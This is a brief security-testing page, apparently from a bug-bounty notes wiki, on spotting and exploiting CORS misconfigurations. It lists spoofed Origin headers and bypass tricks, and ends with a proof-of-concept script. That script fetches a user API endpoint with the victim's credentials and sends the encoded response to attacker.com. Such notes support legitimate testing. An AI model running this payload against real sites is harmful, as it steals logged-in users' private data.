CORS Misconfiguration

Misconfigured CORS allows attacker-controlled sites to make credentialed requests to the target.

Testing

Add an Origin header to every interesting request:

Origin: https://attacker.com
Origin: https://anythinghere-target.com
Origin: null

Check the response for:

Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true

Both headers together = exploitable.

Bypass Techniques

  • Substring match – if they check if (strpos($origin, "target.com")), try https://attacker.com?x=target.com
  • Suffix match – try https://attackertarget.com
  • null origin – some sites allow null origin (sandbox iframes)
  • Subdomain – find any XSS on any subdomain of the target; use it as the origin

PoC

<script>
fetch('https://target.com/api/user', {credentials: 'include'})
  .then(r => r.text())
  .then(d => fetch('https://attacker.com/?d=' + btoa(d)));
</script>

Why It Matters

Even if an endpoint with CORS misconfiguration seems harmless, the same configuration pattern is often reused across the app. A read on a harmless endpoint proves the bypass – then look for it on sensitive API calls.

zseano/cors.txt · Last modified: by drew